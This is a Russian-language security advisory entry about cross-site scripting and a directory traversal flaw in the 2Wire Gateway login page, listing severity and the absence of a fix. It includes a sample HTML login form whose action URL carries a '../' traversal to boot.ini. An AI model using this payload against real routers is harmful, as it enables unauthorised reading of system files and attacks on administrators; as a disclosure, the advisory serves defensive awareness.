Межсайтовый скриптинг в 2Wire Gateway

Дата публикации:
23.01.2004
Дата изменения:
13.11.2008
Всего просмотров:
810
Опасность:
Низкая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
2Wire HomePortal Series
Уязвимые версии: 2Wire Gateway

Описание: Уязвимость обнаружена в 2Wire Gateway. Удаленный пользователь может выполнить XSS нападение против администратора.

<form name="wralogin" method="get"
action="http://<host>/wra/public/wralogin/?error=61&return=password/../../..
/../boot.ini">
<input type="hidden" name="authcode" value="MUQmqC/sBiXfslfYEooIJg==">
<center>
<input type="password" name="password" value="">
<input type="submit" alt="Submit" width="58" height="19" border="0"></td>
</form>
</body>
</html>

URL производителя:www.2wire.com

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: 2Wire-Gateway Cross Site Scripting and Directory Transversal bug in SSL Form

или введите имя

CAPTCHA